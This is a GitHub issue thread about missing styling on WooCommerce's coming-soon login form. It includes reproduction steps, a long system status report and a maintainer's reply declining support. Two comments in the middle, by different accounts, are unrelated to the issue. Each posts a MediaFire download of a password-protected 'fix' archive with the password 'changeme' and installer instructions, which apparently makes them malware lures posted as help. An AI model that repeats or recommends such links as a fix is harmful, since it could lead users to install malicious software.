### ISSUE TITLE
Login form on coming soon banner is missing styling

### ISSUE THREAD

**Issue by Drivingralle** [woothemes/woocommerce#50963]
### Prerequisites

- [X] I have carried out troubleshooting steps and I believe I have found a bug.
- [X] I have searched for similar bugs in both open and closed issues and cannot find a duplicate.

### Describe the bug

There seams to be no styling for the logon form on the coming soon template if the login button is set to show the form.

Tested with TT4, Björk, Raft

### Expected behavior

Editor: Display a preview of the form fields 
Frontend: Display a nice form like on many other website.

### Actual behavior

Editor: No preview. Nothing changes if I toggle the setting: Display login as form
![no preview](https://github.com/user-attachments/assets/bd778e87-b9a3-400b-9ee3-3758d242f361)

Frontend: Form is overlaying an empty "button like" div. No styling just positioning.

![Bildschirmfoto 2024-08-26 um 16 27 06](https://github.com/user-attachments/assets/59f82919-8ecb-44f5-936d-307fe2ed0342)
![Bildschirmfoto 2024-08-26 um 16 25 32](https://github.com/user-attachments/assets/24af3aca-8004-4c7a-932a-9cca27684298)

### Steps to reproduce

1. Setup WP and WooCommerce
2. Setup Coming soon mode
3. Set the login button in header of coming soon template to "Display login as form"
4. Open Website in private tab/window

### WordPress Environment ###

WordPress address (URL): [Redacted]
Site address (URL): [Redacted]
WC Version: 9.2.2
Legacy REST API Package Version: Auf dieser Website ist das alte REST-API-Plugin nicht installiert.
Action Scheduler Version: ✔ 3.8.1
Log Directory Writable: ✔
WP Version: 6.6.1
WP Multisite: –
WP Memory Limit: 256 MB
WP Debug Mode: –
WP Cron: ✔
Language: de_DE
External object cache: –

### Server Environment ###

Server Info: nginx/1.16.0
PHP Version: 8.3.8
PHP Post Max Size: 1.000 MB
PHP Time Limit: 1200
PHP Max Input Vars: 4000
cURL Version: 8.7.1
(SecureTransport) LibreSSL/3.3.6

SUHOSIN Installed: –
MySQL Version: 8.0.16
Max Upload Size: 300 MB
Default Timezone is UTC: ✔
fsockopen/cURL: ✔
SoapClient: ✔
DOMDocument: ✔
GZip: ✔
Multibyte String: ✔
Remote Post: ✔
Remote Get: ✔

### Database ###

[REDACTED]

### Post Type Counts ###

attachment: 1
epi_embed: 39
page: 7
post: 1
revision: 2
wp_global_styles: 2
wp_navigation: 1
wp_template: 1

### Security ###

Secure connection (HTTPS): ✔
Hide errors from visitors: ✔

### Active Plugins (13) ###

Antispam Bee: von pluginkollektiv – 2.11.6
Attachment Pages Redirect: von Samuel Aguilera – 1.1.2
Disable Emojis (GDPR friendly): von Ryan Hellyer – 1.7.6
Disable Login Language Switcher: von Dominik Schilling – 1.0.0
Embed Privacy: von Epiphyt – 1.9.2
Imsanity: von Exactly WWW – 2.8.4
Login Site Icon: von Nick Halsey – 1.1
Make Filename Lowercase: von Ed Reckers (Red Bridge Internet) – 1.0.2
Remove IP: von guido – 0.1
Remove Yoast SEO Comments: von Mitch – 3.1
Safe SVG: von 10up – 2.2.5
Remove XML-RPC Methods: von Walter Ebert – 1.4.0
WooCommerce: von Automattic – 9.2.2

### Inactive Plugins (15) ###

Affiliate Link Marker: von Johannes Kinast <johannes@travel-dealz.de> – 1.0.9
Avatar Privacy: von Peter Putzer – 2.7.0
Cachify: von pluginkollektiv – 2.3.2
Germanized for WooCommerce: von vendidero – 3.17.2
Impressum: von Epiphyt – 2.0.5
InfiniteWP - Client: von Revmakx – 1.13.0
Language Fallback: von Bernhard Kau – 2.0.0
Limit Login Attempts Reloaded: von Limit Login Attempts Reloaded – 2.26.12
Mollie Payments for WooCommerce: von Mollie – 7.7.0
Plugin Report: von Roy Tanck – 2.1.1
Statify: von pluginkollektiv – 1.8.4
Two Factor: von Plugin Contributors – 0.9.1
WooCommerce Stripe Gateway: von WooCommerce – 8.6.1
WP Mail SMTP: von WP Mail SMTP – 4.1.1
Yoast SEO: von Team Yoast – 23.3

### Must Use Plugins (2) ###

Germanix URL: von Thomas Scholz – 1.1
WordPress Mods: von Cross Media Cloud – 1.0.0

### Settings ###

Legacy API Enabled: –
Force SSL: –
Currency: USD ($)
Currency Position: left
Thousand Separator: ,
Decimal Separator: .
Number of Decimals: 2
Taxonomies: Product Types: external (external)
grouped (grouped)
simple (simple)
variable (variable)

Taxonomies: Product Visibility: exclude-from-catalog (exclude-from-catalog)
exclude-from-search (exclude-from-search)
featured (featured)
outofstock (outofstock)
rated-1 (rated-1)
rated-2 (rated-2)
rated-3 (rated-3)
rated-4 (rated-4)
rated-5 (rated-5)

Connected to WooCommerce.com: –
Enforce Approved Product Download Directories: ✔
HPOS feature enabled: –
Order datastore: WC_Order_Data_Store_CPT
HPOS data sync enabled: –

### Logging ###

Enabled: ✔
Handler: Automattic\WooCommerce\Internal\Admin\Logging\LogHandlerFileV2
Retention period: 30 Tage
Level threshold: –
Log directory size: 339 B

### WC Pages ###

Shop-Basis: #44 - /shop/
Warenkorb: #45 - /warenkorb/ -  Enthält den [woocommerce_cart]-Shortcode
Kasse: #46 - /kasse/ -  Enthält den [woocommerce_checkout]-Shortcode
Mein Konto: #47 - /mein-konto/
Allgemeine Geschäftsbedingungen: ❌ Seite nicht festgelegt

### Theme ###

Name: Twenty Twenty-Four
Version: 1.2
Author URL: https://de.wordpress.org
Child Theme: ❌ – Wenn du WooCommerce mit einem Theme
das du nicht selbst entwickelt hast
an eigene Bedürfnisse anpasst
dann empfehlen wir die Verwendung eines Child-Themes. Siehe Wie du ein Child-Theme erstellst (engl.)

WooCommerce Support: ❌ Nicht deklariert

### Templates ###

Overrides: /wp-content/plugins/woocommerce/templates/block-notices/error.php
/wp-content/plugins/woocommerce/templates/block-notices/notice.php
/wp-content/plugins/woocommerce/templates/block-notices/success.php

### Admin ###

Enabled Features: activity-panels
analytics
product-block-editor
coupons
core-profiler
customize-store
customer-effort-score-tracks
import-products-task
experimental-fashion-sample-products
shipping-smart-defaults
shipping-setting-tour
homescreen
marketing
mobile-app-banner
navigation
onboarding
onboarding-tasks
pattern-toolkit-full-composability
product-custom-fields
remote-inbox-notifications
remote-free-extensions
payment-gateway-suggestions
printful
shipping-label-banner
subscriptions
store-alerts
transient-notices
woo-mobile-welcome
wc-pay-promotion
wc-pay-welcome-page
launch-your-store

Disabled Features: experimental-blocks
minified-js
product-pre-publish-modal
settings
async-product-editor-category-field
product-editor-template-system

Daily Cron: ✔ Next scheduled: 2024-08-27 11:19:05 +02:00
Options: ✔
Notes: 70
Onboarding: skipped

### Action Scheduler ###

Abgeschlossen: 18
Oldest: 2024-08-20 00:48:05 +0200
Newest: 2024-08-26 16:24:20 +0200

Ausstehend: 1
Oldest: 2024-08-27 16:12:09 +0200
Newest: 2024-08-27 16:12:09 +0200

### Status report information ###

Generated at: 2024-08-26 16:29:28 +02:00

### Isolating the problem

- [X] I have deactivated other plugins and confirmed this bug occurs when only WooCommerce plugin is active.
- [X] This bug happens with a default WordPress theme active, or [Storefront](https://woocommerce.com/products/storefront/).
- [X] I can reproduce this bug consistently using the steps above.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by chihsuan** [comment]
Thanks for reporting this issue! @Drivingralle We had a look at the issue and we tend not to support it We think it's a bad setting for Gutenberg to have as it describes "login and logout links" but it renders a form. Besides, TT24 theme. has some similar issues too.

![Image](https://github.com/user-attachments/assets/11eb314a-7592-4c6f-b488-80e5dc7667af)


Let us know if you have different thoughts on this. :slightly_smiling_face:
